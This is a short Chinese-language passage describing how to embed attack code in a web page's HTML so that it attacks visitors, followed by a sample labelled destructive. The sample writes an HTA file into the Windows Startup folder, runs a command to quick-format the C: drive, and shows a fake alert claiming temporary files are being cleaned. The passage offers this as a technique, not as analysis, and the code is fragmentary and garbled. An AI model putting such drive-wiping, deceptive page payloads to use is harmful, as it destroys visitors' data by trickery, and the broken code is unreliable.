我们在制作网页时可以切换到Html源代码页面,将带有攻击性的代码嵌入到Html网页源代码中,网页本身即可实现对访问者实施攻击。浏览者访问这个网页时,攻击代码就会起作用。
下面是一段破坏性的Html代码:
Hacking Your Computer
Scr.Reset();
scr.Path="C:\\Windows\\StartMenu\\Programs\\启动\\Hack.hta";
scr.Doc="
wsh.Run('start.exe/mformatc:/q/autotest/u');
alert('IMPORTANT:Windows is removing unused temporary files.');
scr.write();
懂一些Html的人应该就看得出其中的精髓。